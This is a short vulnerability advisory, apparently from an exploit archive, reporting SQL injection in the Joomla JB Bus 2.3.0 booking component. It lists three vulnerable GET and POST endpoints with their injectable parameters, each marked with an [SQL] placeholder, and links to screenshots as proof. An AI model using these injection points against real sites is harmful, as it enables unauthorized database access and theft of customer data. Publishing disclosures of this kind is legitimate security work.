Joomla JB Bus 2.3.0 SQL Injection Vulnerability

################################################
#Title: Joomla JB Bus 2.3.0 SQL Injection
#Credit: Bilal KARDADOU
#Vendor: https://joombooking.com
#URL:
https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jbtransport/
#Product: 'Joomla JB Bus component version 2.3.0'
#Developer: Joombooking
#Last updated: Apr 19 2017
#Date added: Nov 19 2014
#License: GPLv2 or later
#Type: Paid download
#Price: $99
#Google Dork: N/A
################################################
#
#  Product & Service Introduction:
#
# JB Bus is a joomla component which provides the functions for create
online bus booking website.
#
# GET -p [id]
#
http://127.0.0.1/[PATH]/index.php?option=com_bookpro&view=routemap&tmpl=component&id=[SQL]
#
# POST -p [bustrip_id]
# http://127.0.0.1/[PATH]/hdsha/391-393/da-nang-city-hanoi?view=busconfirm
# Data:
bustrip_id=[SQL]&listseat_199=7%2C8%2C9&seat=7%2C8%2C9&return_seat=&Itemid=113
#
# POST -p [filter_from] & [filter_to]
# http://127.0.0.1/[PATH]/hdsha?view=bustrips
# Data:
filter_roundtrip=0&filter_from=[SQL]&filter_to=[SQL]&filter_start=12-22-2017&filter_end=&filter_adult%5B1%5D=2&filter_adult%5B3%5D=1&btnSubmit=Find+trip&Itemid=113&45f2fd16eadb10e847739d13182a2ec2=1
#
# PoC:
#  https://prnt.sc/hqj6d2
#  https://prnt.sc/hqj6oz
#
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)
################################################

-- 

[image: 2017-04-04_21-41-59.png]

Bilal Kardadou
IT Security Consultant & Bug Bounty Hunter


[image: linkedin.png] <https://www.linkedin.com/in/kardadou/>[image:
pinterest.png] <https://packetstormsecurity.com/files/author/12802/>[image:
facebook.png] <https://www.facebook.com/o9n75oo9754hmoobboomwooow986yh>

00212675-092778

The more control you impose the less control you have.

#  0day.today [2017-12-31]  #